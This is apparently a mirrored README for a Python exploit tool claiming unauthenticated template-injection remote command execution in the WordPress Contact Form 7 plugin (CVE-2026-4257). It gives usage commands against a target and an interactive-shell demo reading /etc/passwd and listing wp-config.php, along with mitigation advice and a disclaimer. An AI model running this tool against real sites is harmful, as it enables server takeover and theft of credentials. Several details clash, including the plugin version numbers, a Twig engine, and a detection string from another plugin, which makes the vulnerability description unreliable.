Share 
## https://sploitus.com/exploit?id=12BCB450-9365-5457-BD3E-61E9AFB1F9B5
# โšก WordPress - Contact Form 7 - Unauthenticated SSTI To Remote Command Execution

[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)
[![Python 3.6+](https://img.shields.io/badge/python-3.6+-blue.svg)](https://www.python.org/downloads/)
[![Security](https://img.shields.io/badge/security-exploit-red.svg)](https://github.com/0xgh057r3c0n/CVE-2026-4257)
[![WordPress](https://img.shields.io/badge/WordPress-6.0+-21759B?logo=wordpress&logoColor=white)](https://wordpress.org/)

**CVE-2026-4257** is a critical Server-Side Template Injection (SSTI) vulnerability in Contact Form 7 versions up to 1.7.36, allowing unauthenticated remote attackers to execute arbitrary system commands on the target server.

## Vulnerability Details

| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2026-4257 |
| **Affected Software** | Contact Form 7 โ‰ค 1.7.36 |
| **Vulnerability Type** | Server-Side Template Injection (SSTI) |
| **Impact** | Remote Command Execution (RCE) |
| **Attack Vector** | HTTP GET request with crafted parameters |
| **Authentication** | Not required |
| **CVSS Score** | 9.8 (Critical) |

The vulnerability exists in the plugin's Twig template rendering engine, which fails to properly sanitize user input in form fields, allowing attackers to inject malicious Twig code that gets executed on the server.

## Features

- ๐Ÿ” Automatic version detection - Identifies vulnerable Contact Form 7 installations
- ๐ŸŽฏ Field auto-detection - Automatically discovers form fields for exploitation
- ๐Ÿ’ป Interactive shell - Fully featured command shell for persistent access
- ๐Ÿ” Base64 payload encoding - Bypasses character restrictions
- ๐ŸŽจ Colored output - Enhanced readability with optional color support
- ๐Ÿ“ Verbose mode - Detailed debugging information
- ๐Ÿ”’ SSL bypass - SSL certificate verification disabled by default
- โšก Single command mode - Execute individual commands quickly

## Installation

```bash
git clone https://github.com/0xgh057r3c0n/CVE-2026-4257.git
cd CVE-2026-4257
```

### Dependencies

Install the required Python packages manually:

```bash
pip3 install requests
pip3 install urllib3
```

Or install both at once:

```bash
pip3 install requests urllib3
```

## Usage

### Basic Syntax

```bash
python3 CVE-2026-4257.py  [command] [options]
```

### Quick Start Examples

```bash
# Check if target is vulnerable
python3 CVE-2026-4257.py http://target.com/contact/

# Execute a single command
python3 CVE-2026-4257.py http://target.com/contact/ "id"

# Interactive shell mode
python3 CVE-2026-4257.py -i http://target.com/contact/

# With verbose output
python3 CVE-2026-4257.py -v http://target.com/contact/ "whoami"

# Specify custom form field
python3 CVE-2026-4257.py --field email http://target.com/contact/ "ls -la"
```

## Interactive Shell

The interactive shell provides a persistent command execution environment with additional features.

### Starting Interactive Shell

```bash
python3 CVE-2026-4257.py -i http://target.com/contact/
```

### Shell Commands

| Command | Description |
|---------|-------------|
| `` | Execute system command directly |
| `shell ` | Execute system command |
| `set_field ` | Change form field |
| `show_info` | Display target information |
| `detect_fields` | Detect available form fields |
| `clear` | Clear the screen |
| `help` | Show help menu |
| `exit` / `quit` | Exit the shell |

### Interactive Shell Demo

```bash
โ”Œโ”€[CVE-2026-4257@0xgh057r3c0n]โ”€[~]
โ””โ”€โ”€โ•ผ $ whoami
www-data

โ”Œโ”€[CVE-2026-4257@0xgh057r3c0n]โ”€[~]
โ””โ”€โ”€โ•ผ $ ls -la
total 48
drwxr-xr-x 5 www-data www-data 4096 Oct 15 10:30 .
drwxr-xr-x 3 www-data www-data 4096 Oct 15 10:30 ..
-rw-r--r-- 1 www-data www-data  123 Oct 15 10:30 wp-config.php

โ”Œโ”€[CVE-2026-4257@0xgh057r3c0n]โ”€[~]
โ””โ”€โ”€โ•ผ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

โ”Œโ”€[CVE-2026-4257@0xgh057r3c0n]โ”€[~]
โ””โ”€โ”€โ•ผ $ set_field your-email
[*] Field changed to: your-email
```

## Options

| Option | Description |
|--------|-------------|
| `url` | Target URL with vulnerable Contact Form 7 |
| `payload` | Command to execute (optional in interactive mode) |
| `--field` | Form field name to use for exploitation |
| `--interactive`, `-i` | Start interactive shell mode |
| `--verbose`, `-v` | Enable verbose output |
| `--no-color` | Disable colored output |
| `--verify-ssl` | Verify SSL certificates (disabled by default) |
| `--help`, `-h` | Show help message |

## Detection

The exploit automatically detects:

1. **Contact Form 7 version** - Checks if the target is vulnerable
2. **Form fields** - Identifies available input fields
3. **Field selection** - Automatically selects the best field for exploitation

### Manual Detection

You can manually check for the vulnerability by examining the page source for:
- `suptablesui.min.css?ver=` string
- Contact Form 7 version numbers
- Form fields with `data-name` attributes

## Mitigation

To protect against CVE-2026-4257:

1. **Update immediately** - Upgrade to Contact Form 7 version 1.7.37 or later
2. **Apply patches** - If unable to update, apply the official security patch
3. **Input validation** - Implement additional input sanitization
4. **WAF rules** - Deploy Web Application Firewall rules to detect SSTI attempts
5. **Least privilege** - Run web applications with minimal system privileges

```bash
wp plugin update contact-form-7
```

## Disclaimer

**This tool is for educational and authorized security testing purposes only.**

- โš ๏ธ Do not use this exploit on systems you do not own or have explicit permission to test
- โš ๏ธ The author is not responsible for any misuse or damage caused by this tool
- โš ๏ธ Always obtain proper authorization before conducting security assessments
- โš ๏ธ Unauthorized access to computer systems is illegal in most jurisdictions

## License

This project is licensed under the MIT License. See the [LICENSE](LICENSE) file in the repository for details.

## Author

**0xgh057r3c0n**
- GitHub: [@0xgh057r3c0n](https://github.com/0xgh057r3c0n)
- Discoverer of CVE-2026-4257

## Acknowledgments

- The WordPress security community
- Contact Form 7 plugin team for their response to this vulnerability
- Security researchers who contributed to SSTI exploitation techniques

## References

- [CVE-2026-4257 Detail](https://nvd.nist.gov/vuln/detail/CVE-2026-4257)
- [Contact Form 7 Official Site](https://contactform7.com/)
- [SSTI Vulnerability Guide](https://portswigger.net/web-security/server-side-template-injection)

## Support

If you find this tool useful, please consider:
- โญ Starring the repository on GitHub
- ๐Ÿ“ข Sharing responsibly with security professionals
- ๐Ÿ”’ Reporting any issues or suggestions

---

**IMPORTANT:** This exploit is for authorized security testing only. Unauthorized use is illegal. Always obtain written permission before testing any system.